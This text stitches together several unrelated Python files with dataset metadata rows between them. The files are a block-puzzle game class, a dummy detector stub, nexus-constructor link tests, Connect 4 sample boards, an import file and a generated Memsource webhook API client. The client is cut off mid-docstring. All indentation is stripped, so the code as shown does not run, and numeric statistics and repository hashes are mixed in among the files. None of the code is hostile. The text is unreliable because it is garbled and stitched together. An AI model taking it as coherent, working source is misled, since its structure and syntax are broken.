self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1] + 1] = 2
# Update object location
self.positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
self.positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] + 1]
return True
else:
return False
def getright(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0], self.positionFirstBox[1] + 2]
firstbox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
return [firstbox, secondbox, 1, 0]
elif self.mode == 1:
if self.config == 0:
firstbox = [self.positionFirstBox[0], self.positionSecondBox[1] + 1]
return [firstbox, [], 0, self.config]
if self.config == 1:
positionFirstBox = [self.positionFirstBox[0], self.positionFirstBox[1] + 1]
positionSecondBox = [self.positionSecondBox[0], self.positionSecondBox[1] + 1]
return [positionFirstBox, positionSecondBox, self.mode, self.config]
def moveup(self):
if self.mode == 0:
if self.ismovableup():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionFirstBox[0] - 2][self.positionFirstBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] - 2, self.positionFirstBox[1]]
# Change Mode
self.mode = 1
self.config = 1
return True
else:
return False
elif self.mode == 1:
if self.ismovableup():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionSecondBox[0] - 1][self.positionSecondBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionSecondBox[0] - 1, self.positionSecondBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
return True
elif self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] - 1][self.positionFirstBox[1]] = 2
# Update object location
self.positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
self.positionSecondBox = []
# Change Mode
self.mode = 0
return True
else:
return False
def getup(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
firstbox = [self.positionFirstBox[0] - 2, self.positionFirstBox[1]]
return [firstbox, secondbox, 1, 1]
elif self.mode == 1:
if self.config == 0:
positionSecondBox = [self.positionSecondBox[0] - 1, self.positionSecondBox[1]]
positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
return [positionFirstBox, positionSecondBox, self.mode, self.config]
if self.config == 1:
positionFirstBox = [self.positionFirstBox[0] - 1, self.positionFirstBox[1]]
positionSecondBox = []
return [positionFirstBox, positionSecondBox, 0, self.config]
def movedown(self):
if self.mode == 0:
if self.ismovabledown():
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionFirstBox[0] + 2][self.positionFirstBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionFirstBox[0] + 2, self.positionFirstBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
# Change Mode
self.mode = 1
self.config = 1
return True
else:
return False
elif self.mode == 1:
if self.ismovabledown():
if self.config == 0:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionFirstBox[0] + 1][self.positionFirstBox[1]] = 2
self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] = 2
# Update object location
self.positionSecondBox = [self.positionSecondBox[0] + 1, self.positionSecondBox[1]]
self.positionFirstBox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
return True
elif self.config == 1:
# Erase the object from board
self.board.field[self.positionFirstBox[0]][self.positionFirstBox[1]] = 0
self.board.field[self.positionSecondBox[0]][self.positionSecondBox[1]] = 0
# Re-put object
self.board.field[self.positionSecondBox[0] + 1][self.positionSecondBox[1]] = 2
# Update object location
self.positionFirstBox = [self.positionSecondBox[0] + 1, self.positionFirstBox[1]]
self.positionSecondBox = []
# Change Mode
self.mode = 0
return True
else:
return False
def getdown(self):
if self.mode == 0:
# Object location
secondbox = [self.positionFirstBox[0] + 2, self.positionFirstBox[1]]
firstbox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
return [firstbox, secondbox, 1, 1]
elif self.mode == 1:
if self.config == 0:
# Adjust the box positions
positionSecondBox = [self.positionSecondBox[0] + 1, self.positionSecondBox[1]]
positionFirstBox = [self.positionFirstBox[0] + 1, self.positionFirstBox[1]]
return [positionFirstBox, positionSecondBox, self.mode, self.config]
if self.config == 1:
# Adjust the box positions
positionFirstBox = [self.positionSecondBox[0] + 1, self.positionFirstBox[1]]
positionSecondBox = []
return [positionFirstBox, positionSecondBox, 0, self.config]
def printfield(self):
printer = deepcopy(self.board.field).astype(str)
# Transfer the field and print
for i in range(self.board.field.shape[0]):
for j in range(self.board.field.shape[1]):
if self.board.field[i][j] == 1:
printer[i][j] = 'X'
elif self.board.field[i][j] == 0:
printer[i][j] = 'O'
elif self.board.field[i][j] == 2:
printer[i][j] = 'S'
elif self.board.field[i][j] == 3:
printer[i][j] = 'G'
print("Current Board: \n", printer,"\n")
class Board:
def __init__(self, array):
# Conver the board and store
for i in range(array.shape[0]):
for j in range(array.shape[1]):
if array[i][j] == 'X':
array[i][j] = 1
elif array[i][j] == 'O':
array[i][j] = 0
elif array[i][j] == 'S':
array[i][j] = 2
elif array[i][j] == 'G':
array[i][j] = 3
self.field = array.astype(int)
for i in range(self.field.shape[0]):
for j in range(self.field.shape[1]):
if self.field[i][j] == 3:
# Update Field And Set The Goal Point
self.field[i][j] = 0
self.goal = [i, j]
break
| 48.403941
| 112
| 0.520507
| 1,943
| 19,652
| 5.260422
| 0.045805
| 0.303297
| 0.145876
| 0.105665
| 0.886704
| 0.876627
| 0.863321
| 0.838078
| 0.809901
| 0.769396
| 0
| 0.035764
| 0.373957
| 19,652
| 405
| 113
| 48.523457
| 0.795009
| 0.06208
| 0
| 0.664596
| 0
| 0
| 0.00147
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049689
| false
| 0
| 0.003106
| 0
| 0.251553
| 0.021739
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f75d8056d252f05063a906d0c7a30199a76fe13c
| 195
|
py
|
Python
|
tests/detector/does_not_inherit/__init__.py
|
dadaloop82/viseron
|
1c6c446a4856e16c0e2ed6b9323d169fbdcae20f
|
[
"MIT"
] | 399
|
2020-08-31T21:13:07.000Z
|
2022-03-31T18:54:26.000Z
|
tests/detector/does_not_inherit/__init__.py
|
dadaloop82/viseron
|
1c6c446a4856e16c0e2ed6b9323d169fbdcae20f
|
[
"MIT"
] | 157
|
2020-09-01T18:59:56.000Z
|
2022-03-25T07:14:19.000Z
|
tests/detector/does_not_inherit/__init__.py
|
dadaloop82/viseron
|
1c6c446a4856e16c0e2ed6b9323d169fbdcae20f
|
[
"MIT"
] | 53
|
2020-09-01T07:35:59.000Z
|
2022-03-28T23:21:16.000Z
|
"""Dummy class that does not inherit from the required AbstractObjectDetection."""
class ObjectDetection:
"""Dummy class that does not inherit from the required AbstractObjectDetection."""
| 32.5
| 86
| 0.779487
| 22
| 195
| 6.909091
| 0.5
| 0.131579
| 0.184211
| 0.236842
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0.868421
| 0
| 0
| 0.14359
| 195
| 5
| 87
| 39
| 0.91018
| 0.784615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
f7987d541135e12467c1e68263340cd2f93e7071
| 3,066
|
py
|
Python
|
tests/test_link_transformation.py
|
trnielsen/nexus-constructor
|
65efb6eedca30250b75f142dd29a46bc909958df
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_link_transformation.py
|
trnielsen/nexus-constructor
|
65efb6eedca30250b75f142dd29a46bc909958df
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_link_transformation.py
|
trnielsen/nexus-constructor
|
65efb6eedca30250b75f142dd29a46bc909958df
|
[
"BSD-2-Clause"
] | null | null | null |
from tests.helpers import add_component_to_file
from PySide2.QtGui import QVector3D
from nexus_constructor.component.component import Component
def test_linked_component_is_none_1(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
assert component1.transforms.link.linked_component is None
def test_linked_component_is_none_2(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
component1.transforms.has_link = False
assert component1.transforms.link.linked_component is None
def test_linked_component_is_none_3(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
new_component = Component(component1.file, component1.group)
assert new_component.transforms.link.linked_component is None
def test_linked_component_via_transform_1(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
component2 = add_component_to_file(nexus_wrapper, "field", 42, "component2")
rot = component2.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
component2.depends_on = rot
component1.depends_on = rot
new_component = Component(component1.file, component1.group)
assert new_component.transforms.link.linked_component == component2
def test_linked_component_via_transform_2(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
rot1 = component1.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
component1.depends_on = rot1
component2 = add_component_to_file(nexus_wrapper, "field", 42, "component2")
rot2 = component2.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
component2.depends_on = rot2
rot1.depends_on = rot2
new_component = Component(component1.file, component1.group)
assert new_component.transforms.link.linked_component == component2
def test_linked_component_via_component_1(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
component2 = add_component_to_file(nexus_wrapper, "field", 42, "component2")
rot = component2.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
component2.depends_on = rot
component1.transforms.link.linked_component = component2
new_component = Component(component1.file, component1.group)
assert new_component.transforms.link.linked_component == component2
def test_linked_component_via_component_2(nexus_wrapper):
component1 = add_component_to_file(nexus_wrapper, "field", 42, "component1")
rot1 = component1.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
component1.depends_on = rot1
component2 = add_component_to_file(nexus_wrapper, "field", 42, "component2")
rot2 = component2.add_rotation(QVector3D(1.0, 0.0, 0.0), 90.0)
component2.depends_on = rot2
component1.transforms.link.linked_component = component2
new_component = Component(component1.file, component1.group)
assert new_component.transforms.link.linked_component == component2
| 44.434783
| 80
| 0.776256
| 412
| 3,066
| 5.475728
| 0.104369
| 0.021277
| 0.023936
| 0.095745
| 0.917553
| 0.917553
| 0.895833
| 0.895833
| 0.895833
| 0.895833
| 0
| 0.058604
| 0.126223
| 3,066
| 68
| 81
| 45.088235
| 0.783501
| 0
| 0
| 0.72
| 0
| 0
| 0.053816
| 0
| 0
| 0
| 0
| 0
| 0.14
| 1
| 0.14
| false
| 0
| 0.06
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e39bb09631944e2a9524a8fb7139242bfa313c5a
| 4,360
|
py
|
Python
|
sampleboards.py
|
CooperLloyd/connect4-logic-model
|
1e9330aa25c639b22c00e55b4bdf3c4c60159289
|
[
"MIT"
] | null | null | null |
sampleboards.py
|
CooperLloyd/connect4-logic-model
|
1e9330aa25c639b22c00e55b4bdf3c4c60159289
|
[
"MIT"
] | null | null | null |
sampleboards.py
|
CooperLloyd/connect4-logic-model
|
1e9330aa25c639b22c00e55b4bdf3c4c60159289
|
[
"MIT"
] | null | null | null |
red = 0
black = 1
empty = 2
#Expected Outcome: True
row_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[empty, red, red, red, red, empty, empty],
[red, black, red, black, red, empty, empty],
[black, red, black, red, black, black, empty],
[black, black, red, black, black, red, black],
]
#Expected Outcome: True
col_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[empty, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, black, empty, empty, empty, empty],
]
#Expected Outcome: True
pos_diagonal_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, red, empty, empty, empty],
[empty, empty, red, black, empty, empty, empty],
[black, red, red, black, black, empty, empty],
[red, red, black, black, black, empty, empty],
]
#Expected Outcome: True
neg_diagonal_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[red, black, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, red, black, empty, empty, empty],
[black, red, black, red, empty, empty, empty],
]
#Expected Outcome: True
almost_row_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[empty, red, red, red, empty, empty, red],
[red, black, red, black, red, black, black],
[black, red, black, red, black, black, red],
[black, black, red, black, black, red, black],
]
#Expected Outcome: True
almost_col_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, black, empty, empty, empty, empty],
]
#Expected Outcome: True
almost_pos_diagonal_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[black, red, red, black, empty, empty, empty],
[black, red, red, black, empty, empty, empty],
[red, red, black, black, black, empty, empty],
]
#Expected Outcome: True
almost_neg_diagonal_win = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[red, empty, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, red, empty, empty, empty, empty],
[black, red, black, empty, empty, empty, empty],
]
#Expected Outcome: False
col_loss = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[black, empty, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
]
#Expected Outcome: False (invalid board)
col_black_won_first = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
]
#Expected Outcome: False
black_won = [
[empty, empty, empty, empty, empty, empty, empty],
[empty, empty, empty, empty, empty, empty, empty],
[black, empty, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
[black, red, empty, empty, empty, empty, empty],
]
| 42.330097
| 58
| 0.591743
| 535
| 4,360
| 4.783178
| 0.041122
| 1.101993
| 1.37163
| 1.500586
| 0.963267
| 0.962095
| 0.911684
| 0.891755
| 0.891755
| 0.877296
| 0
| 0.000928
| 0.258257
| 4,360
| 103
| 59
| 42.330097
| 0.790353
| 0.06078
| 0
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3c408b7e24f111f1ac59793e2fe95acfd1aa1c0
| 183
|
py
|
Python
|
nexus_constructor/model/__init__.py
|
ess-dmsc/nexus-geometry-constructor
|
c4d869b01d988629a7864357b8fc2f49a0325111
|
[
"BSD-2-Clause"
] | null | null | null |
nexus_constructor/model/__init__.py
|
ess-dmsc/nexus-geometry-constructor
|
c4d869b01d988629a7864357b8fc2f49a0325111
|
[
"BSD-2-Clause"
] | 62
|
2018-09-18T14:50:34.000Z
|
2019-02-05T15:43:02.000Z
|
nexus_constructor/model/__init__.py
|
ess-dmsc/nexus-geometry-constructor
|
c4d869b01d988629a7864357b8fc2f49a0325111
|
[
"BSD-2-Clause"
] | null | null | null |
from .group import Group # noqa: F401
from .entry import Entry # noqa: F401
from .component import Component # noqa: F401
from .group_container import GroupContainer # noqa: F401
| 36.6
| 57
| 0.759563
| 25
| 183
| 5.52
| 0.36
| 0.231884
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07947
| 0.174863
| 183
| 4
| 58
| 45.75
| 0.834437
| 0.234973
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e3d02fc699e97954a845f4b9e03c336389105f50
| 18,919
|
py
|
Python
|
memsource_cli/api/webhook_api.py
|
unofficial-memsource/memsource-cli-client
|
a6639506b74e95476da87f4375953448b76ea90c
|
[
"Apache-2.0"
] | 16
|
2019-09-25T00:20:38.000Z
|
2021-05-04T05:56:10.000Z
|
memsource_cli/api/webhook_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 26
|
2019-09-30T14:00:03.000Z
|
2021-05-12T11:15:18.000Z
|
memsource_cli/api/webhook_api.py
|
zerodayz/memsource-cli-client
|
c2574f1467539a49e6637c874e88d75c7ef789b3
|
[
"Apache-2.0"
] | 1
|
2021-05-24T16:19:14.000Z
|
2021-05-24T16:19:14.000Z
|
# coding: utf-8
"""
Memsource REST API
Welcome to Memsource's API documentation. To view our legacy APIs please [visit our documentation](https://wiki.memsource.com/wiki/Memsource_API) and for more information about our new APIs, [visit our blog](https://www.memsource.com/blog/2017/10/24/introducing-rest-apis-qa-with-the-memsource-api-team/). If you have any questions, please contact [Memsource Support](<mailto:support@memsource.com>). # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from memsource_cli.api_client import ApiClient
class WebhookApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_web_hook(self, **kwargs): # noqa: E501
"""Create webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_web_hook(async_req=True)
>>> result = thread.get()
:param async_req bool
:param WebHookDto body:
:return: WebHookDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_web_hook_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_web_hook_with_http_info(**kwargs) # noqa: E501
return data
def create_web_hook_with_http_info(self, **kwargs): # noqa: E501
"""Create webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_web_hook_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param WebHookDto body:
:return: WebHookDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_web_hook" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/webhooks', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebHookDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_web_hook(self, web_hook_id, **kwargs): # noqa: E501
"""Delete webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_web_hook(web_hook_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int web_hook_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_web_hook_with_http_info(web_hook_id, **kwargs) # noqa: E501
else:
(data) = self.delete_web_hook_with_http_info(web_hook_id, **kwargs) # noqa: E501
return data
def delete_web_hook_with_http_info(self, web_hook_id, **kwargs): # noqa: E501
"""Delete webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_web_hook_with_http_info(web_hook_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int web_hook_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['web_hook_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_web_hook" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'web_hook_id' is set
if ('web_hook_id' not in params or
params['web_hook_id'] is None):
raise ValueError("Missing the required parameter `web_hook_id` when calling `delete_web_hook`") # noqa: E501
collection_formats = {}
path_params = {}
if 'web_hook_id' in params:
path_params['webHookId'] = params['web_hook_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/webhooks/{webHookId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_web_hook(self, web_hook_id, **kwargs): # noqa: E501
"""Get webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_web_hook(web_hook_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int web_hook_id: (required)
:return: WebHookDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_web_hook_with_http_info(web_hook_id, **kwargs) # noqa: E501
else:
(data) = self.get_web_hook_with_http_info(web_hook_id, **kwargs) # noqa: E501
return data
def get_web_hook_with_http_info(self, web_hook_id, **kwargs): # noqa: E501
"""Get webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_web_hook_with_http_info(web_hook_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int web_hook_id: (required)
:return: WebHookDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['web_hook_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_web_hook" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'web_hook_id' is set
if ('web_hook_id' not in params or
params['web_hook_id'] is None):
raise ValueError("Missing the required parameter `web_hook_id` when calling `get_web_hook`") # noqa: E501
collection_formats = {}
path_params = {}
if 'web_hook_id' in params:
path_params['webHookId'] = params['web_hook_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/webhooks/{webHookId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WebHookDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_web_hook_list(self, **kwargs): # noqa: E501
"""Lists webhooks # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_web_hook_list(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoWebHookDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_web_hook_list_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_web_hook_list_with_http_info(**kwargs) # noqa: E501
return data
def get_web_hook_list_with_http_info(self, **kwargs): # noqa: E501
"""Lists webhooks # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_web_hook_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: Page number, starting with 0, default 0
:param int page_size: Page size, accepts values between 1 and 50, default 50
:return: PageDtoWebHookDto
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_web_hook_list" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('pageNumber', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('pageSize', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api2/v1/webhooks', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageDtoWebHookDto', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_web_hook(self, web_hook_id, **kwargs): # noqa: E501
"""Edit webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_web_hook(web_hook_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int web_hook_id: (required)
:param WebHookDto body:
:return: WebHookDto
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_web_hook_with_http_info(web_hook_id, **kwargs) # noqa: E501
else:
(data) = self.update_web_hook_with_http_info(web_hook_id, **kwargs) # noqa: E501
return data
def update_web_hook_with_http_info(self, web_hook_id, **kwargs): # noqa: E501
"""Edit webhook # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
